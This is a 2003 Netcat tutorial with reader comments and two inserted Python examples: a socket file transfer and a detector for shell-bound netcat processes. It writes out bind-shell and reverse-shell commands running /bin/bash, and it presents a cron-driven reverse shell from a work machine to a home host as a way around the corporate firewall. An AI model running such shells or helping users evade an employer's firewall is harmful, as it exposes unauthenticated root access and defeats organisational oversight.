

Netcat and Reverse Telnet

by KIVILCIM Hindistan, 05/29/2003

Today we live in a virtually secure world of computing, with fancy firewalls, user access lists, intrusion detection schemes, and so on. But occasionally you may just want to copy a file from one computer to another, without breaching security, ringing bells all over the network, or even meddling with cumbersome access lists. You may want to reach your work computer from home, so that you can finish your work, but the guardian firewall would not let you in.

Or you may just want to write your simple network utility to fetch something from somewhere and do something to it, the famous duct-tape method. You don't want to use C++. You don't want to use Perl. You want nothing but the good old glue and fix method.

For all these seemingly difficult tasks there is a wonderful tool called Netcat.

As you'd expect, the name Netcat comes from one of the basic Unix commands, cat. cat "concatenates files and prints on standard output"; Netcat basically does the same. Instead of concatenating files, Netcat concatenates TCP and UDP sockets, making it basically a "cat of ports". Just like its ancestors, the fundamental commands of the Unix environment, Netcat does this one thing and does it perfectly. You can glue it to other commands to make it do whatever you want.

This article examines the basic usage of Netcat, including one or two tricks that will make your life easier.

What can I use Netcat for?

From a basic point of view, Netcat is a telnet program. But that's like calling the Swiss Army Knife just a knife. Netcat was written in 1996 by a hacker called Hobbit to meet all kinds of telnet needs. Today you can easily find a version of Netcat for your flavor of Unix or even Windows. There are also some variants, such as cryptcat, which adds vital encryption features and which we will also use later in this article.

This article sticks to the vanilla Netcat. The examples are prepared with Unix in mind. You can try them on other platforms, but your computer could blow up, your significant other might leave you, and, even worse, you will run out of coffee at once. Well, maybe just the latter.

Preparing Network Interfaces

To try Netcat, we must first make some preparations. Throughout this article we will discuss a connection between two machines. For this article you don't need to have two machines, two computers, or even two network interfaces.

For TCP/IP communication, the Unix platform uses a virtual loopback (lo) interface with a default IP of 127.0.0.1. Under Linux, you can use 0 instead of this IP address. We will use this interface to set up two virtual interfaces.

Note that if we interfere with the 127.0.0.1 interface, we may break the network connection.

Netcat and Reverse Telnet | O'Reilly Media http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html

Instead, we will use the lo:1 and lo:2 virtual interfaces. The following method will allow you to assign many IP numbers to the same network interface, such as eth0:0 or eth0:1. As root, enter:

% ifconfig lo:1 10.0.1.1
% ifconfig lo:2 10.0.1.2

Now enter ifconfig to examine your interfaces:

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:146 errors:0 dropped:0 overruns:0 frame:0
          TX packets:146 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:7708 (7.5 KiB)  TX bytes:7708 (7.5 KiB)

lo:1      Link encap:Local Loopback
          inet addr:10.0.1.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1

lo:2      Link encap:Local Loopback
          inet addr:10.0.1.2  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1

Now that we have two network interfaces, we can continue with our examples as if we were working on two separate computers with different IP addresses.

Network Connection

As I've stated before, Netcat is a telnet client. With the basic usage you can connect to any port with nc host port. When you make a connection this way, everything you type goes to the remote machine (if it's listening to that port) and every response comes back to you. This goes on until the network connection is broken. As for the remote computer, I must remind you that Netcat is both a client and a server.

Now, let's open two consoles. One will be our server, listening to port 5600:

$ nc -l -p 5600

The other will be our client that connects to that port.

$ nc 10.0.1.1 5600

Now everything you do will be repeated at the first console. We have made our first connection. Experiment to your heart's content. Press Enter, Backspace, Ctrl-D, and Ctrl-C and see what happens. Ctrl-C should have cut your connection.

At the first console give the command:

$ nc -l -p 5600 -vv

In the second:

$ nc 10.0.1.1 5600

Did you see anything different?

listening on [any] 5600 ...
10.0.1.1: inverse host lookup failed: Unknown host
connect to [10.0.1.1] from (UNKNOWN) [10.0.1.1] 33354

This time, Netcat was generous with its information. The extra -vv command option put Netcat in verbose mode. If you use one v then you end up with less information. This option is especially valuable when troubleshooting. At the end, when you pressed Ctrl-C, Netcat exited, reporting how many bytes were sent and received.

As in our first example, we made a connection between two virtual computers without any protocol or rights management (as far as the firewalls let us).

File Transfer

One of the most practical uses of this network connection is file transfer. As a basic Netcat function, this feature may be used to great effect in the hands of an experienced user. On a freshly installed computer, setting up an ftp server or, worse, meddling with rcp or scp may be nauseating. Those commands may not be available, for one, and multiple layers of control mechanisms may interfere with their functionality. You can still transfer files with just one nc command.

At the server console:

$ nc -v -w 30 -l -p 5600 > filename.back

and on the client side:

$ nc -v -w 2 10.0.1.1 5600 < filename

Magically, the file named filename is transferred from the client to the server. You can check that they are identical.

The command line uses the new argument -w to make Netcat wait a few seconds before giving up. We made it longer on the server side because it is most affected by a pause. Another important point is the > and < redirection operators, with which Unix users are very familiar.

In the server we said > filename.back. Any output will be directed to this file. As it happens, the output is the file filename which is sent by the client. Think of this as a pipeline. We take a bucket (file), pour the contents into the pipeline (Netcat's port), and at the other end we fill another bucket from the pipeline.
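The Network Connection and File Transfer sections above let nc hide the socket mechanics. The following is an added example, not code from the original article, that performs the same transfer with Python's socket module over the loopback interface: one side listens and writes everything it receives to filename.back (the role of nc -l -p 5600 > filename.back), the other streams filename into the connection (nc 10.0.1.1 5600 < filename), a socket timeout stands in for -w, and a SHA-256 comparison carries out the "check that they are identical" step. The port, temporary file names and payload are constructed for the example.

```python
"""Added example (not code from the original article): the nc file transfer
written with Python sockets so the mechanics are visible. receive_file()
plays `nc -l -p PORT > filename.back`, send_file() plays `nc HOST PORT <
filename`, a socket timeout stands in for nc's -w option, and a SHA-256
comparison performs the "check that they are identical" step. Port, file
names and payload are constructed; everything runs over loopback in one
process."""
import hashlib
import os
import socket
import tempfile
import threading

IDLE_TIMEOUT = 5.0   # seconds, the role of nc -w: give up if nothing happens


def receive_file(host, port, out_path, ready=None):
    """Server side. Accept one connection and copy the stream into out_path
    until the peer closes its end (the EOF that ends `nc ... > file`).
    Raises socket.timeout if nobody connects within IDLE_TIMEOUT."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(IDLE_TIMEOUT)
    if ready is not None:
        ready.set()                       # tell the client it may connect now
    try:
        conn, peer = srv.accept()         # what `nc -vv` reports as "connect to"
    finally:
        srv.close()                       # one transfer per listener, like nc -l
    received = 0
    with conn, open(out_path, "wb") as out:
        conn.settimeout(IDLE_TIMEOUT)
        while True:
            chunk = conn.recv(65536)
            if not chunk:                 # empty read means the client closed
                break
            out.write(chunk)
            received += len(chunk)
    return peer, received


def send_file(host, port, in_path):
    """Client side. Stream the file into the connection, then close it so the
    listener sees EOF. Returns the number of bytes sent."""
    sent = 0
    with socket.create_connection((host, port), timeout=IDLE_TIMEOUT) as conn:
        with open(in_path, "rb") as src:
            for chunk in iter(lambda: src.read(65536), b""):
                conn.sendall(chunk)
                sent += len(chunk)
    return sent


def sha256_of(path):
    """Hash a file in chunks; used to confirm both buckets hold the same bytes."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def free_port(host):
    """Ask the OS for an unused TCP port (the article uses 5600; any works)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def transfer_and_verify(payload, host="127.0.0.1"):
    """Write payload to a temp file, transfer it over loopback and return
    (bytes_sent, bytes_received, hashes_match)."""
    with tempfile.TemporaryDirectory() as d:
        src, dst = os.path.join(d, "filename"), os.path.join(d, "filename.back")
        with open(src, "wb") as f:
            f.write(payload)
        port, ready, outcome = free_port(host), threading.Event(), []
        server = threading.Thread(
            target=lambda: outcome.append(receive_file(host, port, dst, ready)))
        server.start()
        ready.wait(IDLE_TIMEOUT)          # do not connect before the listener is up
        sent = send_file(host, port, src)
        server.join(IDLE_TIMEOUT)
        if not outcome:                   # listener failed or timed out
            return sent, -1, False
        return sent, outcome[0][1], sha256_of(src) == sha256_of(dst)


if __name__ == "__main__":
    # constructed payload, larger than a single recv() so the loop is exercised
    print(transfer_and_verify(os.urandom(300_000)))
```

Run directly, it prints a tuple such as (300000, 300000, True). Note what the listener does not do: it takes the first peer that connects, exactly as nc -l -p 5600 does, which is why the article later points to Cryptcat for anything exposed beyond the loopback interface.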

Telnet


We can now transfer files, but maybe we want to make something more useful. For example, we might want to log in to a remote machine and do some work. We want to telnet without the hassle of working through access control mechanisms. The -e option comes in handy.

On the first console, enter:

$ nc -l -p 5600 -e /bin/bash

and at the second console:

$ nc 10.0.1.1 5600

Now it is as if we are connected to the first machine and typing at the shell. We can see every output of our commands and do whatever we want with the server machine. We are connected to it as the root user. This is admittedly very scary and a bit unwise.

Security Notice and Cryptcat

Dumping output to a shell is the fastest method of remote control. It opens a port and waits for a connection. Whoever connects is welcome, with no security checks. Unlike the following Reverse Telnet, this is an active connection; we can call it duct-tape telnet. If you must set up such a thing on an Internet-connected machine, use Cryptcat. In fact you can use Cryptcat in every example mentioned here instead of Netcat, because they are almost the same (except that Cryptcat uses encryption and a keyphrase). All the command notation is the same.

Small notice: I love Open Source! As the author of Cryptcat states:

Linux version -- why I like Linux... only had to change two lines of code to add encryption.

Thus if you want more security (which you should), use cryptcat with the -k option. Cryptcat's encryption scheme has an embedded keyphrase of metallica. You can (and should) change this with the option -k, using your own keyword. After that, you not only have an easy telnet setup, but you also will be very secure.

Reverse Telnet

As we have such a generic tool, capable of many things, we can try something nastier (and thus more useful). Consider a nice computer, with broadband network access, behind some firewall (as all useful computers are) in our office. The firewall will not allow any outside connections, only those initiated from inside. This computer seems impossible to reach. To begin with, the computer would not have a real IP that we could just type and reach; it is behind a router and firewall, using their IPs instead.

Now what if we want to log into this computer and use it remotely, perhaps grabbing some files we forgot to bring home to work on tonight? We want all this with minimum security breach. Sounds like a challenge.

As we saw before, telnet worked with one machine waiting for a connection and the other connecting to it and giving commands. Telnet will not do the job here; not only are all ports of the corporate firewall blocked, the machine we want to reach does not even have a legal IP. Our technique should do just the reverse.

We have a server whose only allowed outside connection is port 80 for daily use, but it doesn't have an outside IP address. The other computer at home probably has a real IP and whatever ports you want are open at your request. Reversing the roles would solve our problems: make our computer at work connect to the home computer, taking commands from the client and performing them on the server. It's the reverse of usual telnet, so we call it Reverse Telnet.

First, let's name the machines. The one at work is called WORK and the one at home is called HOME. If we do not have a permanent IP at home (as a dialup user usually does not), we should get a dynamic DNS name. Lots of organizations provide them, most at no charge, such as dyndns.org. We do this because in order to connect to the home computer we must know its IP (or domain name) beforehand.

At the work computer, we'll set up a cron job to start at 22:01. Just as in the telnet example itconnects to myhome.dyndns.org (our dynamic DNS address) and starts bash.

And at home just at 22:00 or so we start:

$ nc -vv -l -p 80

to begin listening on port 80 for incoming connections.

At 22:01, WORK connects to HOME, starts bash and says 'Master!' Bingo. We are connected to WORK (or vice versa), and WORK is ready to operate any command we want.

We can try this on our virtual network (lo:1 and lo:2). To start the client listening for a connection:

$ nc -vv -l -p 80

To make a connection from the server:

$ nc 10.0.1.1 80 -e /bin/bash

It is very simple and efficient, because we only use outgoing port 80, the most widely used port because it is used for web access. No one would block port 80 because everyone needs web access. They can force you to use a local proxy for that, but you can use another port like 21 or 23 which are harder to put behind a proxy. If you have Internet access you should be able to find at least one open port.
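A defender's view of the two setups just described, the listener bound to /bin/bash in the Telnet section and the outbound connection that starts bash in the Reverse Telnet section: the following added example, which is not part of the original article, scans a process listing for nc, netcat, cryptcat and ncat invocations that attach a program to the socket and reports whether each one listens or calls out, and to where. The -e, -l and -p options are the ones the article uses; ncat's --exec and --sh-exec spellings are included because that variant names the option differently. The ps-style lines are constructed sample input, and the command lines they contain are the ones shown in this article.

```python
"""Added example, not part of the original article: a process-list check for
netcat-family commands that bind a program to a socket (`-e /bin/bash` in the
Telnet and Reverse Telnet sections). Plain nc use (no -e) is not reported.
SAMPLE_PS is constructed to look like `ps -eo pid,user,args` output."""
import shlex
from os.path import basename

NETCAT_BINARIES = {"nc", "netcat", "ncat", "cryptcat"}
EXEC_OPTIONS = {"-e", "-c", "--exec", "--sh-exec"}
# options that take a value and must not be mistaken for a host or port
OPTIONS_WITH_ARG = {"-p", "-w", "-k", "-s", "-i", "-o", "-g", "-G"}

# constructed sample process list: pid, user, command line
SAMPLE_PS = """\
  412 root   /usr/sbin/sshd -D
 1207 alice  nc -l -p 5600 -vv
 1311 root   nc -l -p 5600 -e /bin/bash
 1402 root   nc 10.0.1.1 80 -e /bin/bash
 1455 bob    nc -e /bin/bash 10.0.1.1 80
 1501 alice  cryptcat -k s3cret -l -p 5600 -e /bin/sh
 1533 www    ncat --sh-exec "/bin/sh -i" -l 4444
 1600 alice  nc -v -w 2 10.0.1.1 5600
""".splitlines()


def analyse_netcat_argv(argv):
    """Return a finding dict if argv is a netcat-family command that attaches
    a program to the connection, else None."""
    if not argv or basename(argv[0]) not in NETCAT_BINARIES:
        return None
    listening, program, port, positional = False, None, None, []
    i = 1
    while i < len(argv):
        a = argv[i]
        if a.startswith(("--exec=", "--sh-exec=")):
            program = a.split("=", 1)[1]
        elif a in EXEC_OPTIONS:
            i += 1
            program = argv[i] if i < len(argv) else "?"
        elif a in ("-l", "--listen"):
            listening = True
        elif a in OPTIONS_WITH_ARG:
            i += 1
            if a == "-p" and i < len(argv):
                port = argv[i]
        elif a.startswith("-") and not a.startswith("--") and len(a) > 2:
            flags = a[1:]                     # bundled short flags, e.g. -lvp
            if "l" in flags:
                listening = True
            if flags[-1] in "ecpwk":          # the last flag consumes the next arg
                i += 1
                if flags[-1] in "ec":
                    program = argv[i] if i < len(argv) else "?"
                elif flags[-1] == "p":
                    port = argv[i] if i < len(argv) else None
        elif not a.startswith("-"):
            positional.append(a)              # host and/or port
        i += 1
    if program is None:
        return None
    if listening:
        mode = "bind shell"                   # the Telnet section's setup
        endpoint = "port " + (port or (positional[0] if positional else "?"))
    else:
        mode = "reverse shell"                # the Reverse Telnet section's setup
        endpoint = ":".join(positional[:2]) if len(positional) >= 2 else "?"
    return {"tool": basename(argv[0]), "mode": mode,
            "program": program, "endpoint": endpoint}


def find_shell_bound_netcat(ps_lines):
    """Scan `pid user args` lines and return one finding per suspicious process."""
    findings = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        try:
            argv = shlex.split(cmd)
        except ValueError:                    # unbalanced quotes in the command line
            continue
        finding = analyse_netcat_argv(argv)
        if finding:
            findings.append({"pid": pid, "user": user, **finding})
    return findings


if __name__ == "__main__":
    for f in find_shell_bound_netcat(SAMPLE_PS):
        print(f"pid {f['pid']} ({f['user']}): {f['tool']} {f['mode']}, "
              f"{f['endpoint']}, runs {f['program']!r}")
```

The check is deliberately keyed on the option that makes the difference: the same nc -l -p 5600 that the article uses for harmless experiments is not reported, while any invocation that hands the socket to a program is, whichever side of the connection it sits on and whether or not the traffic is wrapped by cryptcat.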

Netcat has lots of other uses with which you can experiment through the loopback interface setup. As long as you know the TCP/IP machinery and the basics of the protocols, there is virtually no limit to what you can do with Netcat. In the future, I will describe some other daily (arcane ;) uses of Netcat, Cryptcat, and maybe their complicated and powerful cousin SoCat.


Resources

Netcat
Cryptcat: Netcat with cryptography
SoCat: Netcat on steroids

KIVILCIM Hindistan works as a full time computer security consultant with a CISSP, using Linux and Free Software as weapons of choice.


Showing messages 1 through 4 of 4.

Netcat in windows, 2007-09-12 11:25:14, ITwanabe

I am new to the security aspect of IT and so pardon my question.

I have tried to use nc in windows with some success but I still have a question. If I am connected to a remote system using nc, how can I issue a command to be executed on the remote machine from the server?

I am assuming, I don't have physical access to the remote system.

Thanks for your time.

John.

error in syntax, 2005-04-05 10:39:47, solipsist

this ...
To make a connection from the server:
$ nc 10.0.1.1 80 -e /bin/bash

should be ...
$ nc -e /bin/bash 10.0.1.1 80

at least for my version netcat-1.10_2 on FreeBSD

Cryptcat doesn't work on AIX, 2003-09-10 07:10:27, anonymous2

Hi,

I have tried to get cryptcat working on AIX with no success.

Also the link from this website to cryptcat comes up with page not found on farn9 site.

Any comments / suggestions appreciated.

Thanks for the article, 2003-06-01 10:50:42, anonymous2

Useful article, looking forward to more of this.
